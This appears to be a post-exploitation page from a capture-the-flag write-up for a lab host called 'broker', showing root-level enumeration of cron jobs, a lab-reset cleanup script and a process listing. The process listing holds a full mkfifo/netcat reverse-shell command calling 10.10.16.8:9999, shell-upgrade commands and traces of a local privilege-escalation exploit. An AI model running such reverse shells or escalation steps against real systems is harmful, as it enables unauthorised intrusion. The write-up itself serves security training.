Beyond
This is the Beyond page, where additional post-exploitation enumeration and assessment are carried out as the root
user after the target system has been compromised.
Cron
root@broker:~# crontab -l
no crontab for root
root@broker:~# cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
??
root@broker:~# for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l; done
no crontab for root
no crontab for daemon
no crontab for bin
no crontab for sys
no crontab for sync
no crontab for games
no crontab for man
no crontab for lp
no crontab for mail
no crontab for news
no crontab for uucp
no crontab for proxy
no crontab for www-data
no crontab for backup
no crontab for list
no crontab for irc
no crontab for gnats
no crontab for nobody
no crontab for _apt
no crontab for systemd-network
no crontab for systemd-resolve
no crontab for messagebus
no crontab for systemd-timesync
no crontab for pollinate
no crontab for sshd
no crontab for syslog
no crontab for uuidd
no crontab for tcpdump
no crontab for tss
no crontab for landscape
no crontab for fwupd-refresh
no crontab for usbmux
no crontab for lxd
no crontab for activemq
no crontab for _laurel
????
root@broker:/etc# cd cron.d
root@broker:/etc/cron.d# ll
total 20
drwxr-xr-x 2 root root 4096 Nov 7 12:49 ./
drwxr-xr-x 105 root root 4096 Nov 7 06:53 ../
-rw-r--r-- 1 root root 91 Nov 7 12:48 cleanup
-rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
-rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder
root@broker:/etc/cron.d# cat cleanup
*/20 * * * * root /root/cleanup.sh
*/10 * * * * root /usr/bin/echo "" > /etc/ld.so.preload
Found it: the root-owned /etc/cron.d/cleanup entry runs /root/cleanup.sh every 20 minutes and blanks /etc/ld.so.preload every 10 minutes, so any preload-based persistence is undone on that schedule.
cleanup.sh
root@broker:~# cat cleanup.sh
#!/bin/bash
# Periodic reset of the writable locations on this host.
#
# Anything modified in the last 20 minutes under /tmp, /dev/shm and
# /home/activemq is removed: first loose files anywhere in the tree,
# then top-level directories (recursively).  /home/activemq/user.txt is
# the one file that is always kept.  The matching /etc/cron.d entry runs
# this as root every 20 minutes.

readonly max_age_min=20

#######################################
# Remove recently modified content beneath one directory.
# Arguments: $1   - directory to sweep
#            $@   - optional extra find predicates, applied to the
#                   file pass only (e.g. -not -name 'user.txt')
# Returns:   exit status of the last find invocation
#######################################
sweep() {
  local dir=$1
  shift
  # Files at any depth, filtered by the caller's extra predicates.
  find "$dir" -type f "$@" -mmin "-${max_age_min}" -exec rm -f {} +
  # Only immediate subdirectories; rm -rf takes care of their contents.
  find "$dir" -mindepth 1 -maxdepth 1 -type d -mmin "-${max_age_min}" -exec rm -rf {} +
}

sweep /tmp
sweep /dev/shm
sweep /home/activemq -not -name 'user.txt'
A smart way to keep a static lab system in a known state: recently modified files are purged from the usual writable locations on a fixed schedule.
Processes
root@broker:~# ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 100552 11396 ? Ss Dec12 0:04 /sbin/init
root 401 0.1 1.9 142672 78656 ? S<s Dec12 2:21 /lib/systemd/systemd-journald
root 438 0.0 0.6 289344 27096 ? SLsl Dec12 0:11 /sbin/multipathd -d -s
root 442 0.0 0.1 25732 6736 ? Ss Dec12 0:00 /lib/systemd/systemd-udevd
systemd+ 479 0.0 0.1 89356 6620 ? Ssl Dec12 0:06 /lib/systemd/systemd-timesyncd
root 480 0.0 0.2 51140 11816 ? Ss Dec12 0:00 /usr/bin/VGAuthService
root 481 0.1 0.2 316020 10108 ? Ssl Dec12 1:50 /usr/bin/vmtoolsd
root 482 0.1 0.0 85276 2668 ? S<sl Dec12 1:47 /sbin/auditd
_laurel 484 0.0 0.4 20516 16488 ? S< Dec12 1:20 /usr/local/sbin/laurel --config /etc/laurel/config.toml
systemd+ 498 0.0 0.2 16120 8176 ? Ss Dec12 0:03 /lib/systemd/systemd-networkd
systemd+ 529 0.0 0.3 26060 14052 ? Ss Dec12 0:17 /lib/systemd/systemd-resolved
root 630 0.0 0.1 101236 5940 ? Ssl Dec12 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 645 0.0 0.0 0 0 ? I< Dec12 0:00 [nfit]
message+ 742 0.0 0.1 8848 5192 ? Ss Dec12 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 746 0.0 0.0 82828 3936 ? Ssl Dec12 0:04 /usr/sbin/irqbalance --foreground
root 748 0.0 0.4 32684 19164 ? Ss Dec12 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 749 0.0 0.1 234504 6688 ? Ssl Dec12 0:00 /usr/libexec/polkitd --no-debug
syslog 750 0.0 0.1 222400 6212 ? Ssl Dec12 0:01 /usr/sbin/rsyslogd -n -iNONE
root 751 0.0 0.1 15528 7572 ? Ss Dec12 0:00 /lib/systemd/systemd-logind
root 753 0.0 0.3 392464 12792 ? Ssl Dec12 0:00 /usr/libexec/udisks2/udisksd
root 768 0.0 0.3 317956 12296 ? Ssl Dec12 0:00 /usr/sbin/ModemManager
root 910 0.0 0.0 6892 2988 ? Ss Dec12 0:00 /usr/sbin/cron -f -P
root 942 0.0 0.0 10292 984 ? Ss Dec12 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 944 0.0 0.1 11916 5544 ? S Dec12 1:25 nginx: worker process
www-data 945 0.0 0.1 11932 5560 ? S Dec12 1:09 nginx: worker process
root 950 0.0 0.2 15424 9320 ? Ss Dec12 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 955 0.0 0.0 6172 1064 tty1 Ss+ Dec12 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
activemq 969 0.6 12.1 3544380 488208 ? Sl Dec12 10:57 /usr/bin/java -Xms64M -Xmx1G -Djava.util.logging.config.file=logging.properties -Djava.security.auth.login.config=/opt/apache-activemq-5.15.15//conf/login.config -Dcom.sun.management.jmxremote -Djava.awt.headless=true -Djava.io.tmpdir=/opt/apache-activemq-5.15.15//tmp -Dactivemq.classpath=/opt/apache-activemq-5.15.15//conf:/opt/apache-activemq-5.15.15//../lib/: -Dactivemq.home=/opt/apache-activemq-5.15.15/ -Dactivemq.base=/opt/apache-activemq-5.15.15/ -Dactivemq.conf=/opt/apache-activemq-5.15.15//conf -Dactivemq.data=/opt/apache-activemq-5.15.15//data -jar /opt/apache-activemq-5.15.15//bin/activemq.jar start
root 2237 0.0 0.2 239612 8904 ? Ssl Dec13 0:00 /usr/libexec/upowerd
activemq 5512 0.0 0.0 7368 3504 ? S Dec13 0:00 /bin/bash -c mkfifo /tmp/osaj; nc 10.10.16.8 9999 0</tmp/osaj | /bin/sh >/tmp/osaj 2>&1; rm /tmp/osaj
activemq 5515 0.0 0.0 3532 2036 ? S Dec13 0:00 nc 10.10.16.8 9999
activemq 5516 0.0 0.0 2888 956 ? S Dec13 0:00 /bin/sh
activemq 5521 0.0 0.0 5784 1088 ? S Dec13 0:00 script /dev/null -c bash
activemq 5522 0.0 0.1 8700 5388 pts/0 Ss Dec13 0:00 bash
activemq 5666 0.0 0.2 17592 9308 pts/0 S+ Dec13 0:00 python3 -c import pty; pty.spawn("/bin/bash")
activemq 5667 0.0 0.1 8700 5464 pts/1 Ss Dec13 0:00 /bin/bash
activemq 22185 0.0 0.2 17056 9488 ? Ss Dec13 0:00 /lib/systemd/systemd --user
activemq 22186 0.0 0.0 103472 3648 ? S Dec13 0:00 (sd-pam)
activemq 22434 0.1 0.6 3115868 24912 pts/1 Sl+ Dec13 0:13 jar -t activemq.jar
root 22510 0.0 0.2 16920 10860 ? Ss Dec13 0:00 sshd: activemq [priv]
activemq 22569 0.0 0.2 17744 8624 ? S Dec13 0:00 sshd: activemq@pts/3
activemq 22570 0.0 0.1 8784 5752 pts/3 Ss Dec13 0:00 -bash
root 22620 0.0 0.6 385648 26396 ? Ssl Dec13 0:00 /usr/libexec/fwupd/fwupd
activemq 22701 0.0 0.0 2776 1540 pts/3 S Dec13 0:00 ./exploit-2 /usr/bin/newgrp
activemq 22702 0.0 0.0 2888 1012 pts/3 S Dec13 0:00 sh -c /usr/bin/newgrp
root 22703 0.0 0.0 6220 1080 pts/3 S Dec13 0:00 /usr/bin/newgrp
activemq 22704 0.0 0.1 8896 5752 pts/3 S+ Dec13 0:00 bash
root 22800 0.0 0.0 10008 888 ? Ss Dec13 0:00 nginx: master process /usr/sbin/nginx -c /tmp/nginx.conf
root 22801 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 22802 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 22803 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 22804 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 23047 0.0 0.0 10008 892 ? Ss 01:24 0:00 nginx: master process /usr/sbin/nginx -c /tmp/nginx.conf
root 23048 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23049 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23050 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23051 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23060 0.0 0.2 17188 11152 ? Ss 01:25 0:00 sshd: root@pts/4
root 23063 0.0 0.2 17060 9572 ? Ss 01:25 0:00 /lib/systemd/systemd --user
root 23064 0.0 0.0 103612 3692 ? S 01:25 0:00 (sd-pam)
root 23150 0.0 0.1 8652 5496 pts/4 Ss 01:25 0:00 -bash
root 23230 0.0 0.0 10332 3804 pts/4 R+ 01:34 0:00 ps -auxwww